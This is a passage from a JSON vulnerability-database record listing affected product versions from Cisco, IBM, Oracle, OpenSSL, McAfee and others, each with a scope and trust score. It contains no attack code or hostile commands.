"trust": 0.3, "vendor": "ibm", "version": "1.2.0.12" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.10" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1000v" }, { "model": "telepresence system tx1310", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media and", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3103204.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.2h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "anyconnect secure mobility client for linux", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex business suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.1.0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.5(3)" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.19" }, { "model": "nexus series blade switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.0.0" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-376.1" }, { "model": "jabber for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "telepresence profile series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1.0.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.10" }, { "model": "ace30 application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.28" }, { "model": "edge digital media player 1.6rb5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.12" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "telepresence isdn gateway mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.0.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.6.1.0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wireless lan controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.4" }, { "model": "uc integration for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.3" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.5.0" }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "telepresence system tx1310", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.5" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.33" }, { "model": "telepresence mx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0(1)" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "spa122 analog telephone adapter with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.11" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.23" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uc integration for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "openssh for gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.15" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.7" }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "macos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.12.1" }, { "model": "tandberg codian isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.9" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.9.0" }, { "model": "digital media manager 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.4.0" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "ata series analog terminal adaptors", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptors", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "asr series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500021.2" }, { "model": "project openssl 1.0.1t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.7" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "project openssl 0.9.8ze", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.19" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.25" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "webex meetings server multimedia platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified ip conference phone 10.3.1sr4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.3.5" }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "series stackable managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.3.0" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.0.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.11" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.0.1" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2(2)" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.3" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "aironet series access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "27000" }, { "model": "onepk all-in-one virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3387" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.6.0.1" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.1" }, { "model": "project openssl l", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "13006.1" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.7.0.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11006.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "packaged contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2" }, { "model": "telepresence sx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "project openssl 1.0.1u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nac appliance clean access server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "webex meetings for windows phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.0.1" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.1" }, { "model": "prime optical for service providers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.6.0" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "edge digital media player 1.2rb1.0.3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "340" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "network performance analysis", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.19" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.55" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sonas", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.5" }, { "model": "webex meetings for windows phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "82.8" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.0" }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.7" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.7" }, { "model": "telepresence integrator c series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.9" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "content security management appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.140" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.8" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.14" }, { "model": "jabber client framework components", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4" }, { "model": "unified sip proxy software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8." }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "unified sip proxy software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.3" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "telepresence server and mse", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "701087104.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "ucs series and series fabric interconnects", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "620063000" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.6.0.0" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.1" }, { "model": "netflow generation appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1(1)" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.6" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.11" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.28" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.2.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.9" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.29" }, { "model": "project openssl l", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.18" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.2.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.3" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.3.0" }, { "model": "prime infrastructure", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8zh", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": 